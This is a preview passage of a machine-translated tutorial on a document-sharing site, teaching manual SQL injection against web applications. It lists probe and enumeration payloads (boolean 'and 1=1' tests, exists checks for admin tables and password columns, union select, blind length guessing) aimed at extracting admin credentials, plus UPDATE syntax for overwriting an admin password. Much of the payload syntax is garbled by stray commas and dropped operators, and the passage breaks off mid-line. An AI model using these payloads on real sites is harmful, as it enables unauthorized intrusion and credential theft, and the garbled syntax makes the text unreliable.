- 1、本文档共23页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
手动注入(Manual injection)
Content:
1. to determine whether there is a SQL injection vulnerability
Plus
Plus and 1=1
Plus and 1=2
2.SQL query
And 1=1 1=2
And exists (select * from admin)
And exists (select, username, from, admin)
And exists (select, passwore, from, admin)
Order by 20
Union, select, 1,2,3,4, from, admin
The most commonly used SQL query syntax:
SELECT [column name] [column name 2]
FROM [table name]
WHERE [restrictive conditions]
Cases:
SELECT *
FROM Dv_User
Where UserID=1
Represents all the information about query UserID 1.
To update:
[UPDATE] SET [table name column name]= new value
WHERE [restrictive conditions]
Examples: UPDATE, Dv_User, set, [UserPassword]=, 965eb72c92a549dd, WHERE, UserName=, admin,...
This statement will put the Dv_User in the UserName table for the line for admin UserPassword value 965eb72c92a549dd.
Delete:
DELETE FROM [table name] WHERE [restrictive conditions]
Examples: DELETE, FROM, Dv_User, WHERE, UserName=, test
Delete the row where the user name is test from the Dv_User table
======================================================================================================================================================================= ===========
1. to determine whether the injection point
; and, 1=1, and, 1=2
2. guessing tables: common tables: admin, adminuser, user, pass, password, and so on
And 0 (select count (*) from *)
And 0 (select count (*) from, admin) - determine whether there is a table of admin
3., guess the number of accounts, if you encounter 0, return the correct page, 1 return error page, indicating that the number of accounts is 1
And 0 (select count (*) from admin)
And 1 (select count (*) from admin)
4. guess the field name in the len () bracket, plus the name of the field we think of
And, 1= (select, count (*), from, admin, where, len (*) 0) -
And, 1= (select, count (*), from, admin, where, len (user field name name) 0)
And, 1= (select, count (*), from, admin, where, len (_blank, password field name, p
您可能关注的文档
- 3d诗谜(3D mystery).doc
- 3d装修费用计算公式(3D decoration cost calculation formula).doc
- 3d中英对照表(3D Chinese and English comparison chart).doc
- 3种卷柏属植物挥发性化学成分的气相色谱-质谱联用分析与比较(Analysis and comparison of the combination of the 3 kinds of volatile chemical constituents of Selaginella plants by gas chromatography mass spectrometry).doc
- 3核级阀门规范标准介绍(3 nuclear level valve specification introduction).doc
- 004图坦卡蒙的宝藏(004 treasure of Tutankhamen).doc
- 4 保证安全的技术措施(4 technical measures to ensure safety).doc
- 4.3版本的重要变动德鲁伊的改动(Major changes in version 4.3, Druid changes).doc
- 4级短语词组汇总(4 phrase phrase summary).doc
- 5.0常用命令(5 commonly used commands).doc
文档评论(0)